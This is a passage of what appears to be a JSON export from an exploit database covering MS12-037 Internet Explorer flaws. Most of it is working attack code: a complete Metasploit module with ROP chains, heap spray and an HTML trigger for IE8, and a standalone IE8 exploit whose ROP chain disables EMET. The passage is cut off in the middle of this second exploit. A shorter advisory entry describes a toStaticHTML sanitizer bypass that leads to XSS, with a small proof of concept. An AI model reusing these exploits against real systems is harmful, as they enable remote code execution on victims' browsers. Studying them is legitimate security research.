Explorer 8. \n \nTested on the following mshtml.dll versions: \n* v80760016625 - unpatched install \n* v80760117514 - some patchs \n* v90811216447 - all patchs except for ms12-037 patch \n \n**Important** Do not use a template other than the exploit itself! \n \nVersionsAffected: Internet Explorer 6/7/8/9 \nRepeatability: \nMSADV: MS12-037 \nReferences: http://technet.microsoft.com/en-us/security/bulletin/ms12-037 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876 \nDate public: 06/12/2012 \nCVSS: 9.5 \n\n", "cvss3": {}, "published": "2012-06-12T22:55:00", "type": "canvas", "title": "Immunity Canvas: MS12_037", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2012-06-12T22:55:00", "id": "MS12_037", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_037", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-06-05T15:38:16", "description": "", "cvss3": {}, "published": "2012-06-14T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-1875", "CVE-2012-1875"], "modified": "2012-06-14T00:00:00", "id": "EDB-ID:19141", "href": "https://www.exploit-db.com/exploits/19141", "sourceData": "##\n# This file is part of the Metasploit Framework and may be subject to\n# redistribution and commercial restrictions. Please see the Metasploit\n# web site for more information on licensing and terms of use.\n# http://metasploit.com/\n##\n\nrequire 'msf/core'\n\nclass Metasploit3 < Msf::Exploit::Remote\n\tRank = NormalRanking\n\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\n\n\tdef initialize(info={})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => \"MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption\",\n\t\t\t'Description' => %q{\n\t\t\t\t\tThis module exploits a memory corruption flaw in Internet Explorer 8 when\n\t\t\t\thandling objects with the same ID property. At the moment this module targets\n\t\t\t\tIE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited\n\t\t\t\tin the wild.\n\t\t\t},\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t'Author' =>\n\t\t\t\t[\n\t\t\t\t\t'Dark Son ', # Vulnerability discovery\n\t\t\t\t\t'Qihoo 360 Security Center', # Vulnerability discovery\n\t\t\t\t\t'Yichong Lin', # Vulnerability discovery\n\t\t\t\t\t'Google Inc.', # Vulnerability discovery\n\t\t\t\t\t'juan vazquez' # Metasploit module\n\t\t\t\t],\n\t\t\t'References' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'MSB', 'MS12-037'],\n\t\t\t\t\t[ 'CVE', '2012-1875' ],\n\t\t\t\t\t[ 'OSVDB', '82865'],\n\t\t\t\t\t[ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/'],\n\t\t\t\t\t[ 'URL', 'https://twitter.com/binjo/status/212795802974830592' ] # Exploit found in the wild\n\t\t\t\t],\n\t\t\t'Payload' =>\n\t\t\t\t{\n\t\t\t\t\t'Space' => 1024,\n\t\t\t\t\t'BadChars' => \"\\x00\",\n\t\t\t\t\t'DisableNops' => true\n\t\t\t\t},\n\t\t\t'DefaultOptions' =>\n\t\t\t\t{\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\n\t\t\t\t},\n\t\t\t'Platform' => 'win',\n\t\t\t'Targets' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'Automatic', {} ],\n\t\t\t\t\t[\n\t\t\t\t\t\t'IE 8 on Windows XP SP3 with msvcrt ROP',\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t'Rop' => :msvcrt,\n\t\t\t\t\t\t\t'RopOffset' => '0x5f4',\n\t\t\t\t\t\t\t'Ret' => 0x77c15ed5 # xchg eax, esp # ret # from msvcrt.dll\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t\t[\n\t\t\t\t\t\t'IE 8 on Windows XP SP3 with JRE ROP',\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t'Rop' => :jre,\n\t\t\t\t\t\t\t'RopOffset' => '0x5f4',\n\t\t\t\t\t\t\t'Ret' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t\t[\n\t\t\t\t\t\t'IE 8 on Windows 7 SP1 with JRE ROP',\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t'Rop' => :jre,\n\t\t\t\t\t\t\t'RopOffset' => '0x5f4',\n\t\t\t\t\t\t\t'Ret' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t],\n\t\t\t'Privileged' => false,\n\t\t\t'DisclosureDate' => \"Jun 12 2012\",\n\t\t\t'DefaultTarget' => 0))\n\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n\t\t\t], self.class)\n\n\tend\n\n\tdef get_target(agent)\n\t\t# If the user is already specified by the user, we'll just use that\n\t\treturn target if target.name != 'Automatic'\n\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\n\t\t\t#Windows XP SP3 + IE 8.0\n\t\t\treturn targets[1]\n\t\telsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\n\t\t\t#Windows 7 SP1 + IE 8.0\n\t\t\treturn targets[3]\n\t\telse\n\t\t\treturn nil\n\t\tend\n\tend\n\n\tdef junk(n=4)\n\t\treturn rand_text_alpha(n).unpack(\"V\").first\n\tend\n\n\tdef nop\n\t\treturn make_nops(4).unpack(\"V\").first\n\tend\n\n\tdef ret(t)\n\t\tcase t['Rop']\n\t\twhen :msvcrt\n\t\t\treturn [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll\n\t\twhen :jre\n\t\t\treturn [ 0x7c347f98 ].pack(\"V\") # RETN (ROP NOP) # msvcr71.dll\n\t\tend\n\tend\n\n\tdef popret(t)\n\t\tcase t['Rop']\n\t\twhen :msvcrt\n\t\t\treturn [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll\n\t\twhen :jre\n\t\t\treturn [ 0x7c376541 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcr71.dll\n\t\tend\n\tend\n\n\tdef get_rop_chain(t)\n\n\t\tadjust = ret(t) * 27\n\t\tadjust << popret(t)\n\t\tadjust << [t.ret].pack(\"V\") # stackpivot\n\n\t\t# Both ROP chains generated by mona.py - See corelan.be\n\t\tcase t['Rop']\n\t\twhen :msvcrt\n\t\t\tprint_status(\"Using msvcrt ROP\")\n\t\t\trop =\n\t\t\t[\n\t\t\t\t0x77c4e392, # POP EAX # RETN\n\t\t\t\t0x77c11120, # <- *&VirtualProtect()\n\t\t\t\t0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\n\t\t\t\tjunk,\n\t\t\t\t0x77c2dd6c,\n\t\t\t\t0x77c4ec00, # POP EBP # RETN\n\t\t\t\t0x77c35459, # ptr to 'push esp # ret'\n\t\t\t\t0x77c47705, # POP EBX # RETN\n\t\t\t\t0x00001000, # EBX\n\t\t\t\t0x77c3ea01, # POP ECX # RETN\n\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\n\t\t\t\t0x77c46100, # POP EDI # RETN\n\t\t\t\t0x77c46101, # ROP NOP (-> edi)\n\t\t\t\t0x77c4d680, # POP EDX # RETN\n\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\n\t\t\t\t0x77c4e392, # POP EAX # RETN\n\t\t\t\tnop, # NOPS (-> eax)\n\t\t\t\t0x77c12df9, # PUSHAD # RETN\n\t\t\t].pack(\"V*\")\n\n\t\twhen :jre\n\t\t\tprint_status(\"Using JRE ROP\")\n\t\t\trop =\n\t\t\t[\n\t\t\t\t0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\n\t\t\t\t0x00001000, # (dwSize)\n\t\t\t\t0x7c347f98, # RETN (ROP NOP)\n\t\t\t\t0x7c3415a2, # JMP [EAX]\n\t\t\t\t0xffffffff,\n\t\t\t\t0x7c376402, # skip 4 bytes\n\t\t\t\t0x7c345255, # INC EBX # FPATAN # RETN\n\t\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN\n\t\t\t\t0x7c344f87, # POP EDX # RETN\n\t\t\t\t0x00000040, # flNewProtect\n\t\t\t\t0x7c34d201, # POP ECX # RETN\n\t\t\t\t0x7c38b001, # &Writable location\n\t\t\t\t0x7c347f97, # POP EAX # RETN\n\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]\n\t\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN\n\t\t\t\t0x7c345c30, # ptr to 'push esp # ret '\n\t\t\t].pack(\"V*\")\n\t\tend\n\n\t\tcode = adjust\n\t\tcode << rop\n\t\treturn code\n\n\tend\n\n\tdef on_request_uri(cli, request)\n\n\t\tagent = request.headers['User-Agent']\n\t\tmy_target = get_target(agent)\n\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\n\t\tif my_target.nil?\n\t\t\tprint_error(\"Browser not supported: #{agent}\")\n\t\t\tsend_not_found(cli)\n\t\t\treturn\n\t\tend\n\n\t\tprint_status(\"Client requesting: #{request.uri}\")\n\n\t\tp = payload.encoded\n\n\t\tjs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\n\t\tjs_padding = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(my_target.arch))\n\t\tjs_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))\n\t\tjs_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\n\n\t\tjs_spray = <<-JS\n\t\tvar heap_obj = new heapLib.ie(0x20000);\n\t\tvar code = unescape(\"#{js_code}\");\n\t\tvar rop_chain = unescape(\"#{js_rop}\");\n\t\tvar random = unescape(\"#{js_padding}\");\n\t\tvar nops = unescape(\"#{js_nops}\");\n\n\t\twhile (random.length < 0x80000) random += random;\n\t\twhile (nops.length < 0x80000) nops += nops;\n\n\t\tvar padding = random.substring(0, #{my_target['RopOffset']}-code.length);\n\t\tvar shellcode = code + padding + rop_chain + nops.substring(0, 0x800-code.length-padding.length-rop_chain.length);\n\n\t\twhile (shellcode.length < 0x40000) shellcode += shellcode;\n\t\tvar block = shellcode.substring(0, (0x80000-6)/2);\n\n\t\theap_obj.gc();\n\t\tfor (var z=1; z < 0x385; z++) {\n\t\t\theap_obj.alloc(block);\n\t\t}\n\t\tJS\n\n\t\tjs_spray = heaplib(js_spray, {:noobfu => true})\n\n\t\ttrigger_f = \"trigger\"\n\t\tfeng_shui_f = \"feng_shui\"\n\t\tcrash_f = \"crash\"\n\t\tunescape_f = \"do_unescape\"\n\t\tmain_f = \"main\"\n\t\ta_id = \"MyA\"\n\t\tdanger_id = \"imgTest\"\n\n\t\tif datastore['OBFUSCATE']\n\t\t\tjs_spray = ::Rex::Exploitation::JSObfu.new(js_spray)\n\t\t\tjs_spray.obfuscate\n\n\t\t\ttrigger_f = rand_text_alpha(rand(5) + 4)\n\t\t\tfeng_shui_f = rand_text_alpha(rand(5) + 4)\n\t\t\tcrash_f = rand_text_alpha(rand(5) + 4)\n\t\t\tunescape_f = rand_text_alpha(rand(5) + 4)\n\t\t\tmain_f = rand_text_alpha(rand(5) + 4)\n\t\t\ta_id = rand_text_alpha(rand(5) + 4)\n\t\t\tdanger_id = rand_text_alpha(rand(5) + 4)\n\t\tend\n\n\t\thtml = %Q|\n\t\t\t<HTML>\n\t\t\t<BODY>\n\t\t\t<title></title>\n\t\t\t<DIV id=testfaild>\n\t\t\t\t<img id=\"#{danger_id}\" style=\"display:none\">\n\t\t\t\t<a href=\"javascript:#{feng_shui_f}();\" id=\"#{a_id}\" onClick=\"#{feng_shui_f}();\">\n\t\t\t\t<div style=\"background-color:#FFFFFF; width:30; height:40\" id=\"#{danger_id}\" src=\"\" onMouseOver=\"#{crash_f}();\" onMouseOut=\"#{crash_f}();\">\n\t\t\t\t</div>\n\t\t\t\t</a>\n\t\t\t</DIV>\n\t\t\t<SCRIPT LANGUAGE=\"JavaScript\">\n\t\t\tfunction #{unescape_f}(dword) {\n\t\t\t\tvar t = unescape;\n\t\t\t\tvar d = Number(dword).toString(16);\n\t\t\t\twhile (d.length < 8) d = '0' + d;\n\t\t\t\treturn t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\n\t\t\t}\n\t\t\tfunction #{feng_shui_f}() {\n\t\t\t\tvar tag = 0x1c1c1c0c;\n\t\t\t\tvar vtable1 = #{unescape_f}(tag) + '1234567555555555588888888';\n\t\t\t\tvar divs = new Array();\n\t\t\t\tfor (var i = 0; i < 128; i++) divs.push(document.createElement('div'));\n\t\t\t\ttestfaild.innerHTML = testfaild.innerHTML;\n\t\t\t\tdivs[0].className = vtable1;\n\t\t\t\tdivs[1].className = vtable1;\n\t\t\t\tdivs[2].className = vtable1;\n\t\t\t\tdivs[3].className = vtable1;\n\t\t\t}\n\t\t\tfunction #{crash_f}() {\n\t\t\t\teval(\"#{danger_id}\").src = \"\";\n\t\t\t}\n\t\t\tfunction #{trigger_f}() {\n\t\t\t\tvar x = document.getElementsByTagName(\"div\");\n\t\t\t\tvar fireOnThis = document.getElementById(\"#{a_id}\");\n\t\t\t\tif (document.createEvent) {\n\t\t\t\t\tevObj = document.createEvent('MouseEvents');\n\t\t\t\t\tevObj.iniEvent('click', true, false);\n\t\t\t\t\tfireOnThis.dispatchEvent(evObj);\n\t\t\t\t} else if (document.createEventObject) {\n\t\t\t\t\tx[1].fireEvent('onMouseOver');\n\t\t\t\t\tfireOnThis.fireEvent('onclick');\n\t\t\t\t\tx[1].fireEvent('onMouseOut');\n\t\t\t\t}\n\t\t\t}\n\t\t\tfunction #{main_f}() {\n\n\t\t\t\t#{js_spray}\n\t\t\t\tsetTimeout(\"#{trigger_f}();\", 1000);\n\n\t\t\t}\n\t\t\t#{main_f}();\n\t\t\t</SCRIPT>\n\t\t\t</BODY>\n\t\t\t</HTML>\n\t\t|\n\n\t\thtml = html.gsub(/^\\t\\t\\t/, '')\n\n\t\tprint_status(\"Sending html\")\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\n\tend\n\nend\n\n\n=begin\n* crash\n(a9c.998): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\n*** ERROR: Symbol file could not be found. Defaulted to export\nsymbols for C:\\WINDOWS\\system32\\mshtml.dll -\neax=1c1c1c0c ebx=00000000 ecx=02fdf588 edx=00000001 esi=02fdf588 edi=020bbaf0\neip=6363fcc6 esp=020bba88 ebp=020bba94 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\nmshtml!DllGetClassObject+0xafd09:\n6363fcc6 8b5070 mov edx,dword ptr [eax+70h]\nds:0023:1c1c1c7c=????????\n=end", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/remote/19141.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:36:47", "description": "", "cvss3": {}, "published": "2012-07-12T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2012-1858", "CVE-2012-1858"], "modified": "2012-07-12T00:00:00", "id": "EDB-ID:19777", "href": "https://www.exploit-db.com/exploits/19777", "sourceData": "toStaticHTML: The Second Encounter (CVE-2012-1858)\n\n*HTML Sanitizing Bypass -\n*CVE-2012-1858<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858>\n\nOriginal advisory -\nhttp://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html\n\nIntroduction\n\nThe *toStaticHTML* component, which is found in Internet Explorer > 8,\nSharePoint and Lync is used to sanitize HTML fragments from dynamic and\npotentially malicious content.\n\nIf an attacker is able to break the filtering mechanism and pass malicious\ncode through this function, he/she may be able to perform HTML injection\nbased attacks (i.e. XSS).\n\nIt has been a year since the first\nencounter<http://blog.watchfire.com/wfblog/2011/07/tostatichtml-html-sanitizing-bypass.html>\nwas\npublished, we've now returned with a new bypass method.\n\nVulnerability\n\nAn attacker is able to create a specially formed CSS that will overcome *\ntoStaticHTML*'s security logic; therefore, after passing the specially\ncrafted CSS string through the *toStaticHTML* function, it will contain an\nexpression that triggers a JavaScript call.\n\nThe following JavaScript code demonstrates the vulnerability:\n\n*<script>document.write(toStaticHTML(\"<style>\ndiv{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}\n</style><div>POC</div>\"))</script>*\n\nIn this case the function's return value would be JavaScript executable:\n\n*<style>\ndiv{font-family:rgb('0,0,0)''';}foo');color=expression(alert(1));{;}</style>\n<div>POC</div>*\n\n\n\nThe reason this code bypasses the filter engine is due to two reasons:\n\n 1. The filtering engine allows the string \"expression(\" to exists in\n \"non-dangerous\" locations within the CSS.\n 2. A bug in Internet Explorer's CSS parsing engine doesn't properly\n terminate strings that are opened inside brackets and closed outside of\n them.\n\nWhen combining these two factors the attacker is able to \"confuse\" the\nfiltering mechanism into \"thinking\" that a string is open when in fact it\nis terminated and vice versa. With this ability the attacker can trick the\nfiltering mechanism into entering a state of the selector context which is\nconsidered safer where in fact the code is just a new declaration of the\nsame selector, thus breaking the state machine and bypassing the filter.\n\n\n\nImpact\n\nEvery application that relies on the *toStaticHTML* component to sanitize\nuser supplied data had probably been vulnerable to XSS.\n\n\n\nRemediation\n\nMicrosoft has issued several updates to address this vulnerability.\n\nMS12-037 - http://technet.microsoft.com/en-us/security/bulletin/ms12-037\n\nMS12-039 - http://technet.microsoft.com/en-us/security/bulletin/ms12-039\n\nMS12-050 - http://technet.microsoft.com/en-us/security/bulletin/MS12-050", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/dos/19777.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-05T15:14:53", "description": "", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-1876", "CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "EDB-ID:33944", "href": "https://www.exploit-db.com/exploits/33944", "sourceData": "\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\n var getprocaddr = getprocaddr.toString(16);\n var getprocaddr1 = getprocaddr.substring(4,8);\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u101C%u076d\"); // EMET string\n shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n // EMET disable part 0x01 end\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n\n // EMET disable part 0x02\n // Execute the Corbomite bluff to disarm EAF\n shellcode+= unescape(\"%uc0b8%u6d10\");\n shellcode+= 